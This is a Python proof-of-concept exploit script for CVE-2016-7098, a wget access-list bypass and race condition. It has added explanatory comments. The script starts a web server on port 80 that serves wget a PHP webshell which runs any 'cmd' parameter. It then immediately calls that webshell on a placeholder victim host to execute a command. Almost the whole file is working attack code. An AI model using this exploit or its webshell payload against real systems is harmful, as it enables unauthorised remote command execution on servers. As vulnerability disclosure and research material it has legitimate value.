#!/usr/bin/env python

#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget. 
#
# Adjust target URL (WEBSHELL_URL) before executing.
# 
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
# 

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'   # bind on every interface; the connecting wget must be able to reach this host
HTTP_LISTEN_PORT = 80        # a privileged port on most Unix systems, so binding it normally needs root

# Response body served to the connecting wget by wgetExploit.do_GET. It is a
# small PHP script that runs whatever arrives in the 'cmd' query parameter and
# also touches /tmp/wgethack (presumably as a visible marker that it ran).
# The leading newline and the tab indentation are part of the literal and are
# sent to the client exactly as written.
PAYLOAD='''
<?php
	//our webshell
	system($_GET["cmd"]);
	system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed,
# i.e. before the uploaded "temporary" file gets removed.
# 'victimsvr' is a placeholder host name; per the file header it has to be
# adjusted before the script is run.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through the 'cmd' GET parameter of the webshell.
# do_GET concatenates it verbatim onto WEBSHELL_URL as "?cmd=" + CMD; no
# URL quoting is applied anywhere.
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   """Request handler that drives the CVE-2016-7098 race described in the file header.

   Every GET is answered with PAYLOAD, and while that response is still open
   (this handler has not returned yet) the handler itself fetches
   WEBSHELL_URL. Per the header comment, wget only removes the downloaded
   file after the transfer ends, so the file is present on the target for as
   long as do_GET keeps running. The statement order in do_GET (write body,
   sleep, call back, return) is what creates that window; it is not safe to
   reorder or to close the response early.

   Defensive notes: the header scopes the issue to wget < 1.18, i.e. the
   patched release closes the window. The requested path is never validated
   or used to pick a file here; PAYLOAD is served regardless of what was
   asked for, and self.path is only echoed in the log lines.
   """
   def do_GET(self):
       """Serve PAYLOAD, wait two seconds, then request WEBSHELL_URL before returning.

       Writes a 200 text/plain response whose body is PAYLOAD, sleeps, then
       prints the body returned by GET WEBSHELL_URL?cmd=CMD. Nothing here
       catches errors: an exception from urllib2 propagates out of this
       method. The HTTP connection to wget stays open until the method
       returns.
       """
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"

       # Wait for the file to be flushed to disk on remote host etc.
       # The 2s is a fixed guess; nothing from the target signals readiness.
       # NOTE: the "[+}" prefix in the prints below looks like a typo for
       # "[+]"; it is runtime output and is left unchanged here.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)

       # Request uploaded webshell
       # self.path is only echoed; whether the target really stored the body
       # under that name is assumed, not checked.
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       # CMD is appended verbatim (no URL quoting) to the query string.
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return

# Bind the listener and route every connection to wgetExploit. This runs at
# import time (there is no __main__ guard). NOTE(review): a plain TCPServer
# with no ThreadingMixIn handles one connection at a time, so the sleep
# inside do_GET holds up any other client that connects meanwhile — confirm
# against the SocketServer docs if that matters.
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

# Banner and readiness message. "[+}" looks like a typo for "[+]" but is
# runtime output and is left as-is.
print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

# Blocks for the lifetime of the process; there is no shutdown handling.
handler.serve_forever()


